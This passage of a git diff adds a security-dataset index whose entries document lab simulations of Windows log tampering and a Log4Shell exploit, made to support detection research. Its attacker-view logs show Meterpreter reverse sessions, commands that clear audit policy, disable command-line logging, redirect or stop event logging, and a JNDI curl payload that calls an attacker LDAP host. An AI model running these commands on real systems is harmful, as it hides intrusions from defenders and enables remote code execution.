\n[*] https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: gytdwvr9) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 3 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 09:56:27 -0400 \nmeterpreter > execute -f auditpol.exe -H -a '/set /user:pedro /category:\"DS Access\" /success:disable' \nProcess 4392 created.\nmeterpreter > execute -f auditpol.exe -H -a '/set /user:pedro /category:\"DS Access\" /failure:disable' \nProcess 6664 created. \nmeterpreter > execute -f auditpol.exe -H -a '/remove /user:pedro' \nProcess 4440 created. \nmeterpreter > execute -f auditpol.exe -H -a '/set /category:\"Account Logon\" /success:disable' \nProcess 472 created. \nmeterpreter > execute -f auditpol.exe -H -a '/set /category:\"Account Logon\" /failure:disable' \nProcess 2752 created. \nmeterpreter > execute -f auditpol.exe -H -a '/clear /y' \nProcess 7016 created. \nmeterpreter > "}, "references": ["https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"]}, "SDWIN-220703123711": {"title": "Disabling Process Command Line Logging via Registry Modification", "id": "SDWIN-220703123711", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/07/03", "modification_date": "2022/08/18", "platform": ["Windows"], "type": "atomic", "tags": ["reg", "cmd", "microsoft windows security auditing"], "description": "After getting a shell with elevated privileges on the target, we used reg.exe to modify the HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit registry key.\nLogging of command line in process creation events for Microsoft Windows Security Auditing was disabled by changing the registry value data from 1 to 0 in the ProcessCreationIncludeCmdLine_Enabled registry value.\nThis dataset was generated using a Windows 10 Pro edition (Version:1903,OS Build:18362.30) and Kali Linux (Version:2022.2).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_cmd_process_commandline_logging_disabled.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_meterpreter_process_commandline_logging_disabled.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "reg.exe", "module": "reg.exe"}, {"type": "Manual", "name": "Metasploit", "module": "reg"}], "permissions_required": ["Administrator"], "adversary_view": "***** Using reg.exe\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: kmnbsoc3) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 10 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 20:34:35 -0400 \nmeterpreter > shell \nProcess 5028 created. \nChannel 1 created. \nMicrosoft Windows [Version 10.0.18362.30] \n(c) 2019 Microsoft Corporation. All rights reserved. \nC:\\Users\\pedro\\Downloads>reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit /t REG_DWORD /v ProcessCreationIncludeCmdLine_Enabled /d 0 /f \nreg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit /t REG_DWORD /v ProcessCreationIncludeCmdLine_Enabled /d 0 /f \nThe operation completed successfully. \nC:\\Users\\pedro\\Downloads> \n\n***** Using reg (Meterpreter)\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: wqp60sgl) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 4 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 18:46:35 -0400 \nmeterpreter > reg setval -k 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit' -v 'ProcessCreationIncludeCmdLine_Enabled' -t 'REG_DWORD' -d 0 \nSuccessfully set ProcessCreationIncludeCmdLine_Enabled of REG_DWORD. \nmeterpreter > "}, "references": ["https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg"]}, "SDWIN-220705170038": {"title": "Modifying Security Event Log File Path via Modification of Log Configuration", "id": "SDWIN-220705170038", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/07/05", "modification_date": "2022/07/05", "platform": ["Windows"], "type": "atomic", "tags": ["wevtutil", "cmd", "microsoft windows security auditing"], "description": "After getting a shell with elevated privileges on the target, we used wevtutil.exe to modify the configuration of the Security event log.\n\nEvent logs for Microsoft Windows Security Auditing are stored in a different file (Not-Important-Log.evtx) by changing the standard log path  C:\\Windows\\System32\\Winevt\\Logs\\Security.evtx.\n\nThis dataset was generated using a Windows 10 Enterprise Evaluation edition (Version:21H1,OS Build:19043.1766) and Kali Linux (Version:2021.3).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_wevtutil_modify_security_eventlog_path.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "msf6 exploit(multi/handler) > run\n\n[*] Started HTTPS reverse handler on https://10.0.10.104:8443\n[*] https://10.0.10.104:8443 handling request from 10.0.10.102; (UUID: if81stxw) Staging x64 payload (201308 bytes) ...\n[*] Meterpreter session 2 opened (10.0.10.104:8443 -> 127.0.0.1) at 2022-07-05 17:00:38 -0400\n\nmeterpreter > shell\nProcess 1912 created.\nChannel 1 created.\nMicrosoft Windows [Version 10.0.19043.1766]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\Users\\pedro\\Downloads>wevtutil get-log Security\nwevtutil get-log Security\nname: Security\nenabled: true\ntype: Admin\nowningPublisher: \nisolation: Custom\nchannelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)\nlogging:\n  logFileName: %SystemRoot%\\System32\\Winevt\\Logs\\Security.evtx\n  retention: false\n  autoBackup: false\n  maxSize: 1000000000\npublishing:\n  fileMax: 1\n\nC:\\Users\\pedro\\Downloads>wevtutil set-log Security /logfilename:\"C:\\Windows\\System32\\winevt\\Not-Important-Log.evtx\"\nwevtutil set-log Security /logfilename:\"C:\\Windows\\System32\\winevt\\Not-Important-Log.evtx\"\n\nC:\\Users\\pedro\\Downloads>wevtutil get-log Security\nwevtutil get-log Security\nname: Security\nenabled: true\ntype: Admin\nowningPublisher: \nisolation: Custom\nchannelAccess: O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)\nlogging:\n  logFileName: C:\\Windows\\System32\\winevt\\Not-Important-Log.evtx\n  retention: false\n  autoBackup: false\n  maxSize: 1000000000\npublishing:\n  fileMax: 1\n\nC:\\Users\\pedro\\Downloads>"}, "references": ["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"]}, "SDWIN-220708104215": {"title": "Stopping Event Log Service via Modification of Start Up Type", "id": "SDWIN-220708104215", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/07/08", "modification_date": "2022/08/04", "platform": ["Windows"], "type": "atomic", "tags": ["powershell", "reg", "cmd", "eventlog"], "description": "After getting a shell with elevated privileges on the target, we modified the start up type for the EventLog service to `Disabled`.\n\nAfter the modification, we need to restart our system to make the EventLog service unavailable (Disabled). This data set contains only before-reboot data of our simulation. Even though after-reboot data is not part of the dataset, our attempt to disable the EventLog service was successful during the simulation.\n\nWe have simulated this attack using 3 different procedures: REG command via cmd.exe, REG meterpreter command (Metasploit), and the PowerShell module (Metasploit).\n\nThis dataset was generated using a Windows 10 Pro Evaluation edition (Version:1903,OS Build:18362.30) and Kali Linux (Version:2022.2).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_disable_eventlog_service_startuptype_modification.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_disable_eventlog_service_startuptype_modification_via_registry.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_disable_eventlog_service_startuptype_modification_via_registry.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd"}, {"type": "Manual", "name": "Metasploit", "module": "reg"}, {"type": "Manual", "name": "Metasploit", "module": "powershell"}], "permissions_required": ["Administrator"], "adversary_view": "**** Using reg command via cmd.exe:\n\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: jhdxsqpv) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 20 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 11:20:26 -0400 \n\nmeterpreter > shell \nProcess 7728 created. \nChannel 1 created. \nMicrosoft Windows [Version 10.0.18362.30] \n(c) 2019 Microsoft Corporation. All rights reserved. \nC:\\Users\\IT01-Pedro\\Downloads>REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog /t REG_DWORD /v Start /d 4\nREG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog /t REG_DWORD /v Start /d 4 \nValue Start exists, overwrite(Yes/No)? yes \nThe operation completed successfully. \nC:\\Users\\IT01-Pedro\\Downloads>\n\n**** Using reg meterpreter command:\n\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: r64afjpx) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 19 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 10:50:58 -0400 \n\nmeterpreter > reg setval -k 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog' -v 'Start' -t 'REG_DWORD' -d 4 \nSuccessfully set Start of REG_DWORD. \nmeterpreter >\n\n**** Using PowerShell module:\n\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: bgwdtwdi) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 21 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-04 11:36:38 -0400 \n\nmeterpreter > load powershell \nLoading extension powershell...Success. \nmeterpreter > powershell_execute \"Set-Service -Name EventLog -StartUpType Disabled\" \n[+] Command execution completed: \nmeterpreter >"}, "references": ["https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://www.offensive-security.com/metasploit-unleashed/interacting-registry/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg"]}, "SDWIN-220708104300": {"title": "Stopping Event Log Service after Stopping Depending Services", "id": "SDWIN-220708104300", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/07/08", "modification_date": "2022/08/08", "platform": ["Windows"], "type": "atomic", "tags": ["powershell", "eventlog", "netprofm"], "description": "The simulation of this technique cosniders 2 steps: Disabling the netprofm service (Before reboot) and stopping the Event Log service (After reboot). Therefore, 2 datasets were generated, before-reboot and after-reboot data.\n\nWe have used PowerShell to execute this simulation: Execution using PowerShell (Spawned from cmd.exe) and execution using the PowerShell module from Metasploit.\n\nThis dataset was generated using a Windows 10 Pro Evaluation edition (Version:1903,OS Build:18362.30).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_psh_stop_netprofm_eventlog_before_reboot.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_psh_stop_netprofm_eventlog_after_reboot.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_metasploit_stop_netprofm_eventlog_before_reboot.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_metasploit_stop_netprofm_eventlog_after_reboot.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "PowerShell", "module": "PowerShell", "script": null}, {"type": "Manual", "name": "Metasploit", "module": "PowerShell", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "**** Using PowerShell (cmd.exe) - Before reboot:\n\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: e2mshuiq) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 1 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 15:30:15 -0400 \nmeterpreter > shell \nProcess 9804 created. \nChannel 1 created. \nMicrosoft Windows [Version 10.0.18362.30] \n(c) 2019 Microsoft Corporation. All rights reserved. \nC:\\Users\\IT01-Pedro\\Downloads>powershell \npowershell \nWindows PowerShell \nCopyright (C) Microsoft Corporation. All rights reserved. \nTry the new cross-platform PowerShell https://aka.ms/pscore6 \n\nPS C:\\Users\\IT01-Pedro\\Downloads> Set-Service -Name netprofm -StartupType Disabled \nSet-Service -Name netprofm -StartupType Disabled \nPS C:\\Users\\IT01-Pedro\\Downloads> \n\n**** Using PowerShell (cmd.exe) - After reboot: \n\nmsf6 exploit(multi/handler) > run \n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: v8fufyz7) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 4 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 15:48:54 -0400 \nmeterpreter > shell \nProcess 1536 created. \nChannel 1 created. \nMicrosoft Windows [Version 10.0.18362.30] \n(c) 2019 Microsoft Corporation. All rights reserved. \nC:\\Users\\IT01-Pedro\\Downloads>powershell \npowershell \nWindows PowerShell \nCopyright (C) Microsoft Corporation. All rights reserved. \nTry the new cross-platform PowerShell https://aka.ms/pscore6 \n\nPS C:\\Users\\IT01-Pedro\\Downloads> Stop-Service -Name EventLog -Force \nStop-Service -Name EventLog -Force \nPS C:\\Users\\IT01-Pedro\\Downloads> Get-Service -Name eventlog \nGet-Service -Name eventlog \n\nStatus   Name               DisplayName                            \n------   ----               -----------                            \nStopped  eventlog           Windows Event Log\n\nPS C:\\Users\\IT01-Pedro\\Downloads> \n\n**** Using PowerShell (Metasploit) - Before reboot: \nmsf6 exploit(multi/handler) > run \n\n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: l4nzbqn1) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 5 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 16:39:26 -0400 \nmeterpreter > load powershell \nLoading extension powershell...Success. \nmeterpreter > powershell_execute \" Set-Service -Name netprofm -StartupType Disabled \" \n[+] Command execution completed: \nmeterpreter >\n\n**** Using PowerShell (Metasploit) - After reboot: \nmsf6 exploit(multi/handler) > run \n\n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: khsnizoi) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 6 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-08 16:55:45 -0400 \nmeterpreter > load powershell \nLoading extension powershell...Success. \nmeterpreter > powershell_execute \" Stop-Service -Name EventLog -Force \" \n[+] Command execution completed: \nmeterpreter > powershell_execute \"get-service -Name EventLog\" \n[+] Command execution completed: \n\nStatus   Name               DisplayName \n------   ----               ----------- \nStopped  EventLog           Windows Event Log \n\nmeterpreter > "}, "references": ["https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.2"]}, "SDWIN-220803205800": {"title": "Stopping Event Logging via Creation of MiniNt Registry Key", "id": "SDWIN-220803205800", "contributors": ["Jose Rodriguez @Cyb3rPandaH"], "creation_date": "2022/08/03", "modification_date": "2022/08/03", "platform": ["Windows"], "type": "atomic", "tags": ["reg", "powershell", "eventlog", "minint"], "description": "After getting an elevated meterpreter session, we added the MiniNt registry key in the following hives HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control and HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control.\n\nAfter rebooting the system and trying to access event logs trough the Event Viewer application, we got the following message: Event Viewer cannot open the event log or custom view. Verify that Event Log service is running or query is too long. The request is not supported (50).\n\nWe have simulated this attack using 3 different procedures: REG command via cmd.exe, REG meterpreter command (Metasploit), and the PowerShell module (Metasploit).\n\nThese datasets describe the before-rebooitng phase of the simulation, and they were generated using a Windows 10 Pro Evaluation edition (Version:1903,OS Build:18362.30).", "attack_mappings": [{"technique": "T1562", "sub-technique": "002", "tactics": ["TA0005"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_stop_event_logging_controlset_minint_key.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_stop_event_logging_controlset001_minint_key.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_stop_event_logging_controlset_minint_key.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/psh_stop_event_logging_controlset001_minint_key.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_stop_event_logging_controlset_minint_key.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/cmd_stop_event_logging_controlset001_minint_key.zip"}], "simulation": {"environment": "Lab VM", "tools": [{"type": "Manual", "name": "cmd", "module": "cmd", "script": null}, {"type": "Manual", "name": "Metasploit", "module": "reg", "script": null}, {"type": "Manual", "name": "Metasploit", "module": "PowerShell", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "**** Using reg command via cmd.exe:\n\nmsf6 exploit(multi/handler) > run \n\n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: vtlafkal) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 11 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 22:22:26 -0400 \n\nmeterpreter > shell \n\nProcess 8784 created. \nChannel 1 created. \nMicrosoft Windows [Version 10.0.18362.30] \n(c) 2019 Microsoft Corporation. All rights reserved.  \n\nC:\\Users\\IT01-Pedro\\Downloads>REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt \n\nREG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt \nThe operation completed successfully. \n\nC:\\Users\\IT01-Pedro\\Downloads> \n\n**** Using reg meterpreter command:\n\nmsf6 exploit(multi/handler) > run \n\n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: y2cffmed) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 5 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 19:01:55 -0400       \n\nmeterpreter > reg createkey -k 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt' \n\nSuccessfully created key: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt \n\nmeterpreter > \n\n**** Using PowerShell module: \n\nmsf6 exploit(multi/handler) > run \n\n[*] Started HTTPS reverse handler on https://192.168.56.40:8443 \n[*] https://192.168.56.40:8443 handling request from 192.168.56.43; (UUID: 9203cnga) Staging x64 payload (201308 bytes) ... \n[*] Meterpreter session 9 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-03 19:43:05 -0400 \n\nmeterpreter > load powershell \n\nLoading extension powershell...Success. \n\nmeterpreter > powershell_execute \"New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Control\\MiniNt\" \n\n[+] Command execution completed: \n\n    Hive: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control \n\nName                           Property \n----                           -------- \nMiniNt \n\nmeterpreter > "}, "references": ["https://www.quppa.net/blog/2016/04/14/beware-of-the-minint-registry-key/", "https://twitter.com/0gtweet/status/1182516740955226112", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-item?view=powershell-7.2", "https://www.offensive-security.com/metasploit-unleashed/interacting-registry/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg"]}}, "compound": {"GoldenSAMLADFSMailAccess": {"title": "Golden SAML AD FS Mail Access", "id": "377d9af5-5009-48d9-ae97-1756a01d7ef8", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2021/08/02", "modification_date": "2021/08/02", "platform": ["Windows", "Azure"], "type": "compound", "tags": ["SimuLand"], "description": "This dataset represent a threat actor stealing the AD FS token signing certificate from an on-prem AD FS server to sign a new SAML token, impersonate a privileged user and eventually collect mail data via the Microsoft Graph API.", "attack_mappings": [{"technique": "T1552", "sub-technique": "004", "tactics": ["TA0006"]}, {"technique": "T1606", "sub-technique": "002", "tactics": ["TA0006"]}, {"technique": "T1606", "sub-technique": "002", "tactics": ["TA0006"]}, {"technique": "T1078", "sub-technique": "004", "tactics": ["TA0001", "TA0003", "TA0004", "TA0005"]}, {"technique": "T1098", "sub-technique": "002", "tactics": ["TA0003"]}, {"technique": "T1114", "sub-technique": null, "tactics": ["TA0009"]}], "files": [{"type": "Cloud", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/AADAuditEvents.Zip"}, {"type": "Cloud", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/Microsoft365DefenderEvents.Zip"}, {"type": "Cloud", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/OfficeActivityEvents.Zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/WindowsEvents.Zip"}], "simulation": {"environment": "SimuLand", "environment_link": "https://github.com/Azure/SimuLand/tree/main/2_deploy/aadHybridIdentityADFS"}, "references": ["https://github.com/Azure/SimuLand", "https://github.com/Azure/SimuLand/tree/main/labs/01_GoldenSAMLADFSMailAccess"]}, "Log4Shell": {"title": "Log4Shell", "id": "34861b31-60d9-4c2a-a25d-df929256004b", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2021/12/11", "modification_date": "2022/05/13", "platform": ["Windows", "Linux"], "type": "compound", "tags": null, "description": "Datasets created while simulating a threat actor exploiting [CVE 2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228) via a JNDI Reference Java Object.\nIn Log4j <= 2.14, `Message Lookups` were enabled by default creating an input validation vulnerability.\nA threat actor could take advantage of this vulnerability to make a Java application process JNDI lookups to download and execute Java objects from an attacker controlled naming service.\nThere are a few types of Java objects that can be stored in a directory service.\nA JNDI reference object is one of them. A JNDI reference jave object points to the location of the Java object requested. \n", "attack_mappings": [{"technique": "T1190", "sub-technique": null, "tactics": ["TA0001"]}, {"technique": "T1203", "sub-technique": null, "tactics": ["TA0002"]}], "notebooks": null, "files": [{"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/pcap_log4shell_cve2021_44228_jndi_reference.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/pcap_log4shell_cve2021_44228_java_serialized.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/securityauditing_log4shell_cve2021_44228_java_serialized_object.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/sysmon_log4shell_cve2021_44228_java_serialized_object.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/vminsights_vmconnection_log4shell_cve2021_44228_jndi_reference.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/syslog_auoms_auditd_log4shell_cve2021_44228_jndi_reference.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/syslog_sysmon_log4shell_cve2021_44228_jndi_reference.zip"}], "simulation": {"environment": "Microsoft Sentinel To-Go", "tools": [{"type": "Manual", "name": "sh", "module": "sh", "script": "https://github.com/Cyb3rWard0g/log4jshell-lab/blob/main/research-notes/2021-12-11_01-CVE-2021-44228-simulation.md"}], "permissions_required": ["User"], "adversary_view": "curl -X GET -H 'user-agent: ${jndi:ldap://192.168.2.6:1389/o=reference}' 192.168.2.5:8080/Log4j-2.14.0-SNAPSHOT/api"}, "references": ["https://isc.sans.edu/diary/RCE+in+log4j%2C+Log4Shell%2C+or+how+things+can+get+bad+quickly/28120", "https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell", "https://github.com/Cyb3rWard0g/log4jshell-lab"]}}}
\ No newline at end of file
diff --git a/datasets/.index/sec-dsets-index.json.gz b/datasets/.index/sec-dsets-index.json.gz
new file mode 100644
index 0000000000000000000000000000000000000000..39b1d7de532a6b4f7b3842ad89bf64928a0eac8a
GIT binary patch
literal 68506
zcmV)PK()UgiwFpC?*n53|8r$yEo5_LbaO3fZe(S6E^2dcZUF4P3uD?yvMBsldb4}K
zJORCtIN#104A>?Hn*g@s40Bi^2~aE~A_?1M_uSuptGgv3K!A8S<IKR$#<pm6S65e8
zRaaG4{ri>bJ0nwjRY3oK)hZWnTN#dF6joqZRuLHT*f)L4fZtxhx2R+}6CItX_B}dr
z4OJVW7XRu4dS&XkMM4koo#xoSYxX9-<9g8Qw^vQ4XSlwDnvU+8gNgAS{aTv#c=uLy
zb!PDDcl-`??wgL?)m5Ji&M_R5W0V|Ah8sD$**CRyO~#h$_Z@dcMg*`(xBhfYng+AR
zPt*Ygs#4-m!*!mfsMwo$2L7(aqq6F&sPfb|E#D=hk#2Ou(_C{*{)XP#L(@Y5h3XkT
za*eTTc!uqJNYx(<*Hc~7fZw50(;grdjZ6<P(uaw=hK}&Cu7TSbXiSC&#5g@)HEm?t
zp0C;(`2rv?(7iE*o@^b#3${N|Eo+L55I6(jHXiD`&IlU8!l2$nyEptSo{Q@Hs&?NU
zspBz#L8c5#YiL8;{5BytX|qgT#!bCRFEjTI!w3{rnr~_pTkRslFf4vbe&eIxgy=W%
z)$jlN0WA$8@=Veo_QbN1#!#RajB?xYjh^G&d$YD=y1_((b=5F=;_fZezQ+%SzCZQ~
zxtyy$W(TG}oZz)}F+~Cbvzjx?UA3F1xt5_#T+^Rs%5)XI+(`9&!_Dd8-;`o<>Z6y_
z9Lq8^y!bgo<GN(kx*p#(Vq}v2ZjN6Oz&&#`vDAQ6{{70ZA57P=M=*RGJ__3mppoP1
zj+?R6o|p4o!wBJtz3x$9@QgD(vKKQRSqI;7tOdN#ZF>safk1-V#t82ZKp#e}I-2e8
zS~b{T6T0c=Xdh395dO1(PS7<rT-YEUjOKM+<J-i9O+u&vuN&EX;jWr?A57yBL-GrP
z)w58>Ll`Cii5IhMUdXbdkmZ0UkeT|qk>RTuyr4N#9p$`m$${1A0F$X&UJhl>QRmgU
z<M{<vQnDO$5d7@CLR)+~cAa41a$wp|ExhwGm}kPyyDgqJ9m~ilExy8B7b|SN&Y&0l
z`K4ob?8BjWE5xi>j*k6r0PI!C(G6Ie0<>#QG|lk5&Z`gjiyBbf^%%<rJ@_8WhYX`+
zSfR}@1wkor(wCrd8}>=i3QMr_da)FIQzU&}7}ILlO|exiil?<NH=l*8#?8gW%}M=p
z&=}Z=YxvPC!3%0xKG%kp&}UEFUVm`<@K`yyX?|gx(r4G~S6XU`KVejc4`Ffc4Lf+X
zeRWZ}44zk>#wOi|3G>MpSf;?`zhJ!lFI_O$Vki<cD3b|=h~eU1w2qDUJB1Yiu&7!_
zzg;@E@p}O!PLZ^yGmO6$zLR>EcG>8w6AMeq0p>-R{Y1S?yo>=0mtkkkoQXf4_^3~q
